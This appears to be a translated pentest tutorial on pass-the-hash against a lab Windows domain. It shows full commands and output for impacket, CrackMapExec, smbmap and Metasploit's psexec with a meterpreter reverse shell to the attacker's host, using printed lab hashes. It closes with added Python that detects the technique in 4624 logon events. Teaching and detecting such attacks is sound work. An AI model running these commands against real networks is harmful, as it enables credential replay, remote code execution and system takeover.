Domain Penetration Study (6): PTH, the Pass-the-Hash Attack
Domain Penetration Study (1): Windows Authentication Mechanisms
Domain Penetration Study (2): The Kerberos Protocol
Domain Penetration Study (3): Information Gathering Inside the Domain
Domain Penetration Study (4): Dumping Passwords & Hashes
Domain Penetration Study (5): IPC-Based Remote Connections
PTH: the Pass-the-Hash Attack
As covered in the Windows Authentication Mechanisms article (the network authentication / Net-NTLM section), once you have obtained the NTLM hash of a user on the target machine, you can complete authentication with that NTLM hash directly, with no need to crack it.
For hash extraction, see Domain Penetration Study (4): Dumping Passwords & Hashes.
For example, the NTLM hash obtained here is 4d01fbeeaf2b706478943e0889df5622.
Tools that can perform Pass the Hash:
Note that PTH is still built on top of an IPC remote connection, so the account-privilege requirements are the same as those described in Domain Penetration Study (5): IPC-Based Remote Connections.
impacket
pip3 install impacket
- psexec.py
psexec.py -hashes :<hash> <domain>/<domain user>@192.168.10.2
- smbexec.py
smbexec.py -hashes :<hash> <domain>/<domain user>@192.168.10.2
PS C:\Users\AresX> smbexec.py -hashes :4d01fbeeaf2b706478943e0889df5622 de1ay/administrator@192.168.10.201
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
- wmiexec.py
PS C:\Users\AresX> wmiexec.py -hashes :4d01fbeeaf2b706478943e0889df5622 de1ay/administrator@192.168.10.201 whoami
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] SMBv2.1 dialect used
de1ay\administrator
CrackMapExec
https://github.com/byt3bl33d3r/CrackMapExec/wiki
pip2 install crackmapexec
As of March 2020, the official release does not yet support Python 3.
Installing on Windows additionally requires Microsoft Visual C++ 14.0; installing on a *nix system is recommended.
Passing the hash with CrackMapExec:
aresx@XXXXXXXXXX:~$ cme smb 192.168.10.201 -u administrator -H 4d01fbeeaf2b706478943e0889df5622 -x whoami
CME 192.168.10.201:445 PC [*] Windows 6.1 Build 7601 (name:PC) (domain:DE1AY)
CME 192.168.10.201:445 PC [+] DE1AY\administrator 4d01fbeeaf2b706478943e0889df5622 (Pwn3d!)
CME smb:445 XXXXXXXXXX [*] Windows 10.0 Build 18362 (name:XXXXXXXXXX) (domain:XXXXXXXXXX)
CME 192.168.10.201:445 PC [+] Executed command
CME 192.168.10.201:445 PC de1ay\administrator
[*] KTHXBYE!
Smbmap
https://github.com/ShawnDEvans/smbmap
PS E:\Tools\内网渗透工具集\smbmap> python3 .\smbmap.py -u administrator -d de1ay -p f471ca8ea823361ef9393d97e7a1873c:4d01fbeeaf2b706478943e0889df5622 -H 192.168.10.201
[+] IP: 192.168.10.201:445 Name: PC
Disk     Permissions   Comment
----     -----------   -------
ADMIN$   READ, WRITE   远程管理
C$       READ, WRITE   默认共享
IPC$     NO ACCESS     远程 IPC
PS E:\Tools\内网渗透工具集\smbmap>
Smbmap must be given the hash in the form LM Hash:NTLM Hash.
Metasploit
The module used is exploit/windows/smb/psexec.
Note that the hash entered here is also in the form LM Hash:NTLM Hash.
=[ metasploit v5.0.21-dev ]
+ -- --=[ 1889 exploits - 1065 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
[*] Starting persistent handler(s)...
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf5 exploit(windows/smb/psexec) > set LPORT 7778
LPORT => 7778
msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.10.201
RHOSTS => 192.168.10.201
msf5 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.10.201   yes       The target address range or CIDR identifier
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.10.1     yes       The listen address (an interface may be specified)
   LPORT     7778             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf5 exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf5 exploit(windows/smb/psexec) > set SMBPass f471ca8ea823361ef9393d97e7a1873c:4d01fbeeaf2b706478943e0889df5622   // LM hash before the colon, NTLM hash after it
SMBPass => f471ca8ea823361ef9393d97e7a1873c:4d01fbeeaf2b706478943e0889df5622
msf5 exploit(windows/smb/psexec) > set SMBDomain de1ay
SMBDomain => de1ay
msf5 exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 192.168.10.1:7778
[*] 192.168.10.201:445 - Connecting to the server...
[*] 192.168.10.201:445 - Authenticating to 192.168.10.201:445|de1ay as user 'Administrator'...
[*] 192.168.10.201:445 - Selecting PowerShell target
[*] 192.168.10.201:445 - Executing the payload...
[+] 192.168.10.201:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 192.168.10.201
[*] Meterpreter session 1 opened (192.168.10.1:7778 -> 192.168.10.201:49482) at 2020-03-10 13:54:44 +0800
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
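Every tool above authenticates the same way: an NTLM network logon (Windows logon type 3) over SMB, which the target records as Security event 4624, so that event is where a defender looks for this activity. The Python below is an added example, not part of the original post or of any tool it covers; it applies the commonly used 4624 pass-the-hash heuristic (logon type 3, logon process NtLmSsp, session key length 0, subject SID S-1-0-0, excluding ANONYMOUS LOGON) to constructed sample events. Field names follow the 4624 event schema; the heuristic itself is an assumption to tune, since legitimate NTLM logons from non-domain-joined hosts match it too.

```python
# Added example: triage Windows Security 4624 events for the network-logon
# pattern that pass-the-hash tools (psexec.py, smbexec.py, wmiexec.py, cme,
# smbmap, Metasploit psexec) leave on the target. The events below are
# constructed for this example; they are not captured from the lab above.
from collections import Counter

SAMPLE_EVENTS = [
    # PTH-style: NTLM over the network, no session key, no local caller SID
    {"EventID": 4624, "LogonType": 3, "LogonProcessName": "NtLmSsp",
     "KeyLength": 0, "SubjectUserSid": "S-1-0-0",
     "TargetUserName": "administrator", "TargetDomainName": "DE1AY",
     "IpAddress": "192.168.10.1"},
    # Normal Kerberos network logon from a domain-joined workstation
    {"EventID": 4624, "LogonType": 3, "LogonProcessName": "Kerberos",
     "KeyLength": 0, "SubjectUserSid": "S-1-0-0",
     "TargetUserName": "administrator", "TargetDomainName": "DE1AY",
     "IpAddress": "192.168.10.10"},
    # NTLM network logon that negotiated a 128-bit session key
    {"EventID": 4624, "LogonType": 3, "LogonProcessName": "NtLmSsp",
     "KeyLength": 128, "SubjectUserSid": "S-1-0-0",
     "TargetUserName": "svc_backup", "TargetDomainName": "DE1AY",
     "IpAddress": "192.168.10.50"},
    # Null session: excluded, no credential was used
    {"EventID": 4624, "LogonType": 3, "LogonProcessName": "NtLmSsp",
     "KeyLength": 0, "SubjectUserSid": "S-1-0-0",
     "TargetUserName": "ANONYMOUS LOGON", "TargetDomainName": "NT AUTHORITY",
     "IpAddress": "192.168.10.77"},
]

def is_pth_candidate(ev):
    """Heuristic (assumed, not from the post): successful network logon
    negotiated by NtLmSsp with a 0-bit session key and no local subject SID."""
    return (ev["EventID"] == 4624 and ev["LogonType"] == 3
            and ev["LogonProcessName"] == "NtLmSsp" and ev["KeyLength"] == 0
            and ev["SubjectUserSid"] == "S-1-0-0"
            and ev["TargetUserName"].upper() != "ANONYMOUS LOGON")

def pth_candidates(events):
    """Return matching events plus a per-(source IP, account) count, the pivot
    an analyst wants: one source reaching many hosts as one admin account."""
    hits = [ev for ev in events if is_pth_candidate(ev)]
    counts = Counter(
        (ev["IpAddress"], ev["TargetDomainName"] + "\\" + ev["TargetUserName"])
        for ev in hits)
    return hits, counts
```

Run it over exported 4624 events from every host in the lab; the (source IP, account) counter is what separates a single admin session from a hash being replayed across the network.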